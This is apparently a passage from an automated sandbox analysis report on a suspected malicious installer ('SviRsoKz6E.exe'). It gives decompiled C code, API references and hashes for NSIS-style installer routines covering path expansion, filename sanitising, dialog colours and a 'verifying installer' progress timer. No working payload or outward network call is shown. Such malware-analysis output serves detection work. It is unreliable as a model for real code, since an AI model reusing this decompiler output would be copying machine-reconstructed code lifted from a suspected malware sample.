                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                  • String ID: %s=%s$[Rename]
                  • API String ID: 2171350718-1727408572
                  • Opcode ID: 815f7fa3b6cd14db27a3936003ecedc7e124757dc95e5a8345d3b19d10c1e787
                  • Instruction ID: e2b4b59c5115c054d9977882ffa936deea793db07019febf4a6c543227337bd7
                  • Opcode Fuzzy Hash: 815f7fa3b6cd14db27a3936003ecedc7e124757dc95e5a8345d3b19d10c1e787
                  • Instruction Fuzzy Hash: 39312431205B15BBD2207B65AD48F6B3A5CDF45754F14003BFA85F62C2DBBCE9028AAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406154, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E00406154(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x423efc; // 0x81b80f
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x424778;
				_t39 = 0x4236c0;
				_t90 = 0x4236c0;
				if(_a4 >= 0x4236c0 && _a4 - 0x4236c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E00406154(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4236c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x425000;
							E004060C1(_t90, (_t97 << 0xa) + 0x425000);
						} else {
							E0040601F(_t90,  *0x424728);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E0040639C(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42472c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4247c4;
						if( *0x4247c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x424724;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x424728,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x424728,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FA8((_t80 & 0x0000003f) +  *0x424778, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424778, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00406154(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060C1(_a4, _t39);
			}



























                  0x00406154
                  0x00406154
                  0x00406154
                  0x0040615a
                  0x0040615f
                  0x00406161
                  0x00406170
                  0x00406170
                  0x00406178
                  0x00406179
                  0x0040617a
                  0x0040617b
                  0x0040617e
                  0x00406186
                  0x00406188
                  0x0040619f
                  0x004061a2
                  0x004061a2
                  0x00406379
                  0x00406379
                  0x0040637d
                  0x00000000
                  0x00000000
                  0x004061af
                  0x004061b5
                  0x00000000
                  0x00000000
                  0x004061bb
                  0x004061bc
                  0x004061bf
                  0x004061c2
                  0x0040636c
                  0x00406376
                  0x00406378
                  0x00406378
                  0x0040636e
                  0x00406370
                  0x00406372
                  0x00406373
                  0x00406373
                  0x00000000
                  0x0040636c
                  0x004061c8
                  0x004061cc
                  0x004061dc
                  0x004061e3
                  0x004061e6
                  0x004061ee
                  0x004061f1
                  0x004061f8
                  0x004061f9
                  0x004061fc
                  0x00406319
                  0x0040631c
                  0x0040634c
                  0x0040634f
                  0x00406354
                  0x00406358
                  0x00406358
                  0x0040635d
                  0x00406363
                  0x00406365
                  0x00000000
                  0x00406365
                  0x0040631e
                  0x00406321
                  0x00406336
                  0x0040633d
                  0x00406323
                  0x0040632a
                  0x0040632a
                  0x00406345
                  0x00406348
                  0x00406311
                  0x00406312
                  0x00406312
                  0x00000000
                  0x00406348
                  0x00406202
                  0x00406209
                  0x0040620b
                  0x0040620c
                  0x00406226
                  0x00406226
                  0x0040622d
                  0x0040622d
                  0x00406234
                  0x00406238
                  0x00406238
                  0x00406239
                  0x0040623b
                  0x00406274
                  0x00406277
                  0x00406287
                  0x0040628a
                  0x00406292
                  0x00406298
                  0x00406298
                  0x004062f7
                  0x004062f7
                  0x004062f9
                  0x00000000
                  0x00000000
                  0x0040629c
                  0x004062a3
                  0x004062a4
                  0x004062a6
                  0x004062c0
                  0x004062ce
                  0x004062d4
                  0x004062d6
                  0x004062f4
                  0x004062f4
                  0x004062f4
                  0x00000000
                  0x004062f4
                  0x004062dc
                  0x004062e5
                  0x004062e8
                  0x004062ee
                  0x004062f2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004062f2
                  0x004062a8
                  0x004062ab
                  0x00000000
                  0x00000000
                  0x004062ba
                  0x004062bc
                  0x004062be
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004062be
                  0x00000000
                  0x004062f7
                  0x0040627f
                  0x00000000
                  0x0040623d
                  0x00406258
                  0x0040625d
                  0x00406260
                  0x00406300
                  0x00406300
                  0x00406304
                  0x0040630c
                  0x0040630c
                  0x00000000
                  0x00406304
                  0x0040626a
                  0x004062fb
                  0x004062fb
                  0x004062fe
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004062fe
                  0x0040623b
                  0x0040620e
                  0x00406212
                  0x00000000
                  0x00000000
                  0x00406214
                  0x00406218
                  0x00000000
                  0x00000000
                  0x0040621a
                  0x0040621e
                  0x00000000
                  0x00406220
                  0x00406220
                  0x00000000
                  0x00406220
                  0x0040621e
                  0x00406383
                  0x0040638d
                  0x00406399
                  0x00406399
                  0x00000000

                  APIs
                  • GetSystemDirectoryA.KERNEL32 ref: 0040627F
                  • GetWindowsDirectoryA.KERNEL32(Mfkeoxlzmclr,00000400,?,00420508,00000000,00405220,00420508,00000000), ref: 00406292
                  • SHGetSpecialFolderLocation.SHELL32(00405220,00000000,?,00420508,00000000,00405220,00420508,00000000), ref: 004062CE
                  • SHGetPathFromIDListA.SHELL32(00000000,Mfkeoxlzmclr), ref: 004062DC
                  • CoTaskMemFree.OLE32(00000000), ref: 004062E8
                  • lstrcatA.KERNEL32(Mfkeoxlzmclr,\Microsoft\Internet Explorer\Quick Launch), ref: 0040630C
                  • lstrlenA.KERNEL32(Mfkeoxlzmclr,?,00420508,00000000,00405220,00420508,00000000,00000000,004178E0,00000000), ref: 0040635E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                  • String ID: Mfkeoxlzmclr$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                  • API String ID: 717251189-4780296
                  • Opcode ID: 188556e7dd67b187b2ef37ee62a8a6cc26365b5387ae4cc73a5f120017cd6666
                  • Instruction ID: 8fbc972aa6bd3719c406fe4e3ec738975147f7369702dd1472e60f0af39698f0
                  • Opcode Fuzzy Hash: 188556e7dd67b187b2ef37ee62a8a6cc26365b5387ae4cc73a5f120017cd6666
                  • Instruction Fuzzy Hash: 31610671900111AADF20AF65DC84BBE3BA4AB46310F12417FE953B62D1C73C49A2CB9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040639C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040639C(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AC6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405A84("*?|<>/\":", _t5))) == 0) {
							E00405C15(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                  0x0040639e
                  0x004063a6
                  0x004063ba
                  0x004063ba
                  0x004063c0
                  0x004063cd
                  0x004063cd
                  0x004063ce
                  0x004063d0
                  0x004063d4
                  0x004063d6
                  0x004063df
                  0x004063e1
                  0x004063fb
                  0x00406403
                  0x00406403
                  0x00406408
                  0x0040640a
                  0x0040640c
                  0x00406410
                  0x00406411
                  0x00406414
                  0x0040641c
                  0x0040641e
                  0x00406422
                  0x00000000
                  0x00000000
                  0x00406428
                  0x0040642d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040642d
                  0x00406432

                  APIs
                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SviRsoKz6E.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 004063F4
                  • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406401
                  • CharNextA.USER32(?,"C:\Users\user\Desktop\SviRsoKz6E.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406406
                  • CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406416
                  Strings
                  • *?|<>/":, xrefs: 004063E4
                  • "C:\Users\user\Desktop\SviRsoKz6E.exe" , xrefs: 004063D8
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040639D
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Char$Next$Prev
                  • String ID: "C:\Users\user\Desktop\SviRsoKz6E.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 589700163-2126375693
                  • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                  • Instruction ID: d9f0ee3981b821fe41e3526cabf2d3b5ed91aab2121061eeaaee8554b2496e7d
                  • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                  • Instruction Fuzzy Hash: 161108518047A129FB3206384C44B777FD84F97760F1A507BE9C2722C2D67C5CA68BAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004041AC, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004041AC(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                  0x004041be
                  0x00404274
                  0x00000000
                  0x00404274
                  0x004041cf
                  0x004041d3
                  0x00000000
                  0x004041ed
                  0x004041ed
                  0x004041f6
                  0x00000000
                  0x00000000
                  0x004041f8
                  0x00404204
                  0x00404207
                  0x00404207
                  0x0040420d
                  0x00404213
                  0x00404213
                  0x0040421f
                  0x00404225
                  0x0040422c
                  0x0040422f
                  0x00404232
                  0x00404234
                  0x00404234
                  0x0040423c
                  0x00404242
                  0x00404242
                  0x0040424c
                  0x00404251
                  0x00404254
                  0x00404259
                  0x0040425c
                  0x0040425c
                  0x0040426c
                  0x0040426c
                  0x00000000
                  0x0040426f

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                  • String ID:
                  • API String ID: 2320649405-0
                  • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                  • Instruction ID: aaf6f474a4af46f2497c0aff4df426b114d26e681d2b1e7af029b8f8d9950092
                  • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                  • Instruction Fuzzy Hash: 422162B16007049BCB20DF78D908F5BBBF8AF81754B048A6EF992A22E1D734E944CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004051E8, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004051E8(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423f04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4247f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00406154(0, _t39, 0x420508, 0x420508, _a4);
					}
					_t26 = lstrlenA(0x420508);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423ee8, 0x420508);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x420508;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x420508)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x420508, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                  0x004051ee
                  0x004051fa
                  0x004051fd
                  0x00405203
                  0x0040520f
                  0x00405212
                  0x00405215
                  0x0040521b
                  0x0040521b
                  0x00405221
                  0x00405229
                  0x0040522c
                  0x00405249
                  0x0040524d
                  0x00405256
                  0x00405256
                  0x00405260
                  0x00405269
                  0x00405275
                  0x0040527c
                  0x00405280
                  0x00405283
                  0x00405296
                  0x004052a4
                  0x004052a4
                  0x004052a8
                  0x004052aa
                  0x004052ad
                  0x00000000
                  0x004052ad
                  0x0040522e
                  0x00405236
                  0x0040523e
                  0x00405244
                  0x00000000
                  0x00405244
                  0x0040523e
                  0x0040522c
                  0x004052b7

                  APIs
                  • lstrlenA.KERNEL32(00420508,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                  • lstrlenA.KERNEL32(00403208,00420508,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                  • lstrcatA.KERNEL32(00420508,00403208,00403208,00420508,00000000,004178E0,00000000), ref: 00405244
                  • SetWindowTextA.USER32(00420508,00420508), ref: 00405256
                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                  • String ID:
                  • API String ID: 2531174081-0
                  • Opcode ID: b08f2dfb0154d146624c2a85736964c18aae38e83127c4de365ddcd676addf21
                  • Instruction ID: 13bf9d5a188301c634d68c5bb2c809f87baf544d33da629d3068cd84ff66c9cb
                  • Opcode Fuzzy Hash: b08f2dfb0154d146624c2a85736964c18aae38e83127c4de365ddcd676addf21
                  • Instruction Fuzzy Hash: 7F218C71E00518BBDB119FA5DD81A9EBFB9EF09354F14807AF544B6290C7798A808F98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404A98, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404A98(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                  0x00404aa6
                  0x00404ab3
                  0x00404ab9
                  0x00404af7
                  0x00404af7
                  0x00404b06
                  0x00404b0d
                  0x00000000
                  0x00404b0f
                  0x00404abb
                  0x00404aca
                  0x00404ad2
                  0x00404ad5
                  0x00404ae7
                  0x00404aed
                  0x00404af4
                  0x00000000
                  0x00404af4
                  0x00000000

                  APIs
                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AB3
                  • GetMessagePos.USER32 ref: 00404ABB
                  • ScreenToClient.USER32 ref: 00404AD5
                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404AE7
                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B0D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Message$Send$ClientScreen
                  • String ID: f
                  • API String ID: 41195575-1993550816
                  • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                  • Instruction ID: c5e689f19116b5cd7588311b3231e42886eb7a503382143ef86565be6c6ceac4
                  • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                  • Instruction Fuzzy Hash: 98015E71A40219BADB00DBA4DD85BFFBBBCAF59711F10016BBB40B61D0C7B499458BA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x4138d8; // 0x62e00
					_t11 =  *0x41f8e4;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                  0x00402dc7
                  0x00402dd5
                  0x00402ddb
                  0x00402ddb
                  0x00402de9
                  0x00402deb
                  0x00402df1
                  0x00402df8
                  0x00402dfa
                  0x00402dfa
                  0x00402e10
                  0x00402e20
                  0x00402e32
                  0x00402e32
                  0x00402e3a

                  APIs
                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                  • MulDiv.KERNEL32(00062E00,00000064,?), ref: 00402E00
                  • wsprintfA.USER32 ref: 00402E10
                  • SetWindowTextA.USER32(?,?), ref: 00402E20
                  • SetDlgItemTextA.USER32 ref: 00402E32
                  Strings
                  • verifying installer: %d%%, xrefs: 00402E0A
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Text$ItemTimerWindowwsprintf
                  • String ID: verifying installer: %d%%
                  • API String ID: 1451636040-82062127
                  • Opcode ID: c12f5796f431ffac12d06fef0705727a44af994ad502cf00351caa1c45e3c2e6
                  • Instruction ID: 483ea5b0a2f0e0c8b194c47557f81135a9cf1dc15d145a61dc19a9cae62ee66c
                  • Opcode Fuzzy Hash: c12f5796f431ffac12d06fef0705727a44af994ad502cf00351caa1c45e3c2e6
                  • Instruction Fuzzy Hash: CD014F70640209BBEF10AF60DE09EEE37A9AB04305F008039FA06A51D0DBB499559B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                  Download Yara Rule
